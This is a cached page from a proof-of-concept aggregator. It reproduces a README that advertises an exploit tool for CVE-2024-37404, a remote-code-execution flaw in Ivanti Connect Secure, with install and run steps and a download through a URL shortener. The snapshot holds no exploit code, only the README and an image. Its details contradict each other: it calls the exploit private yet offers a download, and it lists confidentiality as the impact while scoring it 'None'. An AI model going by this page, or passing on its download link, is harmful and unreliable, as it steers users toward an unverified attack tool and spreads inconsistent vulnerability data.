Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-37404 PoC — Ivanti Connect Secure和Ivanti Policy Secure 安全漏洞

Source
Associated Vulnerability
Title:Ivanti Connect Secure和Ivanti Policy Secure 安全漏洞 (CVE-2024-37404)
Description:Ivanti Connect Secure和Ivanti Policy Secure都是美国Ivanti公司的产品。Ivanti Connect Secure是安全远程网络连接工具。Ivanti Policy Secure是一个网络访问控制 (NAC) 解决方案。 Ivanti Connect Secure和Ivanti Policy Secure存在安全漏洞,该漏洞源于对用户的输入验证不当。攻击者利用该漏洞可以远程执行代码。
Readme
## 🌟 Description
CVE-2024-37404 - Ivanti Connect Secure - Authenticated RCE via OpenSSL CRLF Injection
An attacker with administrative access to the web application, potentially gained through exploitation of previous vulnerabilities or credential compromise, could execute arbitrary code on the underlying system with root privileges.

## Details

- **CVE ID**: [CVE-2024-37404]
- **Discovered**: 2024-04-05
- **Published**: 2024-10-08
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/4XwoO)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-37404
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```


### Options

Options in README.txt

### Example

![image](https://github.com/nothe1senberg/CVE-2024-37404/blob/main/photo_2024-10-12_10-57-48.jpg)


## Affected versions
Ivanti Connect Secure versions prior to 22.7R2.1 and 22.7R2.2, and Ivanti Policy Secure versions prior to 22.7R1.1


## 📈 CVSS Information
Score: 9.1

Severity: CRITICAL

Confidentiality: None

Integrity: High

Availability: High

Attack Vector: Network

Attack Complexity: Low
File Snapshot

[4.0K] /data/pocs/ea19fd18ce6fdf5ba8d2450c8a5fb5a97e093809 ├── [ 78K] photo_2024-10-12_10-57-48.jpg └── [1.4K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.